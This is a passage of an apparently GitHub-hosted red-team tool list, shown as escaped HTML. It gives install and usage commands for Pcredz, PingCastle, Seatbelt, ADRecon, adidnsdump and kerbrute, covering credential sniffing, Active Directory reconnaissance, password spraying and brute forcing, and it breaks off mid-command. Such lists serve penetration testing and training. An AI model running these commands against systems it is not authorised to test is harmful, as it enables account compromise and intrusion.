class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ed\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003etmp\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003epcap\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan 
class=\"pl-s1\"\u003edirectory\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eto\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003eparse\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e (Live Capture)\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 ./Pcredz -i eth0 -v\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e .\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ePcredz\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ei\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003eeth0\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ev\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/vletoux/pingcastle\"\u003ePingCastle\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pingcastle\" class=\"anchor\" aria-label=\"Permalink: 🔙PingCastle\" href=\"#pingcastle\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" 
aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePing Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e (Download)\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003ehttps://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./PingCastle.exe\"\u003e\u003cpre\u003e.\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-v\"\u003ePingCastle\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003eexe\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" 
href=\"https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/GhostPack/Seatbelt\"\u003eSeatbelt\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-seatbelt\" class=\"anchor\" aria-label=\"Permalink: 🔙Seatbelt\" href=\"#seatbelt\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSeatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: 
(Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSeatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with \u003ca href=\"https://visualstudio.microsoft.com/downloads/\" rel=\"nofollow\"\u003eVisual Studio Community Edition\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen up the project .sln, choose \"release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run all checks and output to output.txt\nSeatbelt.exe -group=all -full \u0026gt; output.txt\n\n# Return 4624 logon events for the last 30 days\nSeatbelt.exe \u0026quot;LogonEvents 30\u0026quot;\n\n# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*\nSeatbelt.exe \u0026quot;reg \\\u0026quot;HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\\u0026quot; 3 .*defini.* true\u0026quot;\n\n# Run remote-focused checks against a remote system\nSeatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\\sam -password=\u0026quot;yum \\\u0026quot;po-ta-toes\\\u0026quot;\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run all checks and output to output.txt\u003c/span\u003e\nSeatbelt.exe -group=all -full \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e output.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Return 4624 logon events for the last 30 days\u003c/span\u003e\nSeatbelt.exe \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eLogonEvents 30\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Query the registry three levels deep, 
returning only keys/valueNames/values that match the regex .*defini.*\u003c/span\u003e\nSeatbelt.exe \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ereg \u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003eHKLM\\SOFTWARE\\Microsoft\\Windows Defender\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e 3 .*defini.* true\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run remote-focused checks against a remote system\u003c/span\u003e\nSeatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\u003cspan class=\"pl-cce\"\u003e\\s\u003c/span\u003eam -password=\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eyum \u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003epo-ta-toes\u003cspan class=\"pl-cce\"\u003e\\\"\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull command groups and parameters can be found \u003ca href=\"https://github.com/GhostPack/Seatbelt#command-groups\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://exord66.github.io/csharp-in-memory-assemblies\" rel=\"nofollow\"\u003ehttps://exord66.github.io/csharp-in-memory-assemblies\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/sense-of-security/adrecon\"\u003eADRecon\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adrecon\" class=\"anchor\" aria-label=\"Permalink: 🔙ADRecon\" href=\"#adrecon\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGreat tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be run from any workstation that is connected to the environment, even hosts that are not domain members.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation\" rel=\"nofollow\"\u003eBlackHat USA 2018 SlideDeck\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePrerequisites\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e.NET Framework 3.0 or later (Windows 7 includes 3.0)\u003c/li\u003e\n\u003cli\u003ePowerShell 2.0 or later (Windows 7 includes 2.0)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell 
notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/sense-of-security/ADRecon.git\"\u003e\u003cpre\u003egit clone https://github.com/sense-of-security/ADRecon.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can download a zip archive of the \u003ca href=\"https://github.com/sense-of-security/ADRecon/archive/master.zip\"\u003elatest release\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# To run ADRecon on a domain member host.\nPS C:\\\u0026gt; .\\ADRecon.ps1\n\n# To run ADRecon on a domain member host as a different user.\nPS C:\\\u0026gt;.\\ADRecon.ps1 -DomainController \u0026lt;IP or FQDN\u0026gt; -Credential \u0026lt;domain\\username\u0026gt;\n\n# To run ADRecon on a non-member host using LDAP.\nPS C:\\\u0026gt;.\\ADRecon.ps1 -Protocol LDAP -DomainController \u0026lt;IP or FQDN\u0026gt; -Credential \u0026lt;domain\\username\u0026gt;\n\n# To run ADRecon with specific modules on a non-member host with RSAT. 
(Default OutputType is STDOUT with -Collect parameter)\nPS C:\\\u0026gt;.\\ADRecon.ps1 -Protocol ADWS -DomainController \u0026lt;IP or FQDN\u0026gt; -Credential \u0026lt;domain\\username\u0026gt; -Collect Domain, DomainControllers\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon on a domain member host.\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e .\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon on a domain member host as a different user.\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1 -DomainController \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP or FQDN\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Credential \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-cce\"\u003e\\u\u003c/span\u003esername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon on a non-member host using LDAP.\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1 -Protocol LDAP -DomainController \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP or FQDN\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Credential \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-cce\"\u003e\\u\u003c/span\u003esername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e To run ADRecon with specific modules on a non-member host with RSAT. 
(Default OutputType is STDOUT with -Collect parameter)\u003c/span\u003e\nPS C:\u003cspan class=\"pl-cce\"\u003e\\\u0026gt;\u003c/span\u003e.\u003cspan class=\"pl-cce\"\u003e\\A\u003c/span\u003eDRecon.ps1 -Protocol ADWS -DomainController \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP or FQDN\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Credential \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-cce\"\u003e\\u\u003c/span\u003esername\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -Collect Domain, DomainControllers\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage and parameter information can be found \u003ca href=\"https://github.com/sense-of-security/adrecon#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://vk9-sec.com/domain-enumeration-powerview-adrecon/\" rel=\"nofollow\"\u003ehttps://vk9-sec.com/domain-enumeration-powerview-adrecon/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/dirkjanm/adidnsdump\"\u003eadidnsdump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adidnsdump\" class=\"anchor\" aria-label=\"Permalink: 🔙adidnsdump\" href=\"#adidnsdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath 
d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBy default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump\"\u003e\u003cpre\u003epip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/dirkjanm/adidnsdump\ncd adidnsdump\npip install .\"\u003e\u003cpre\u003egit clone https://github.com/dirkjanm/adidnsdump\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e adidnsdump\npip install \u003cspan class=\"pl-c1\"\u003e.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e 
\u003cem\u003eThe tool requires \u003ccode\u003eimpacket\u003c/code\u003e and \u003ccode\u003ednspython\u003c/code\u003e to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install \u003ca href=\"https://github.com/CoreSecurity/impacket\"\u003eimpacket from GitHub\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Display the zones in the domain where you are currently in\nadidnsdump -u icorp\\\\testuser --print-zones icorp-dc.internal.corp\n\n# Display all zones in the domain\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp\n\n# Resolve all unknown records (-r)\nadidnsdump -u icorp\\\\testuser icorp-dc.internal.corp -r\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Display the zones in the domain where you are currently in\u003c/span\u003e\nadidnsdump -u icorp\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003etestuser --print-zones icorp-dc.internal.corp\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Display all zones in the domain\u003c/span\u003e\nadidnsdump -u icorp\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003etestuser icorp-dc.internal.corp\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Resolve all unknown records (-r)\u003c/span\u003e\nadidnsdump -u icorp\u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003etestuser icorp-dc.internal.corp -r\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/\" rel=\"nofollow\"\u003eBlog - Getting in the Zone: dumping Active Directory DNS using adidnsdump\u003c/a\u003e\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg\" alt=\"adidnsdump\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/\" rel=\"nofollow\"\u003ehttps://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ropnop/kerbrute\"\u003ekerbrute\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-kerbrute\" class=\"anchor\" aria-label=\"Permalink: 🔙kerbrute\" href=\"#kerbrute\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Go)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go get github.com/ropnop/kerbrute\"\u003e\u003cpre\u003ego get github.com/ropnop/kerbrute\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Make)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/ropnop/kerbrute\ncd kerbrute\nmake all\"\u003e\u003cpre\u003egit clone https://github.com/ropnop/kerbrute\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e kerbrute\nmake all\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# User Enumeration\n./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt\n\n# Password Spray\n./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123\n\n# Brute User\n./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman\n\n# Brute Force\n./kerbrute -d lab.ropnop.com bruteforce -\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e User Enumeration\u003c/span\u003e\n./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Password Spray\u003c/span\u003e\n./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Brute User\u003c/span\u003e\n./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst 
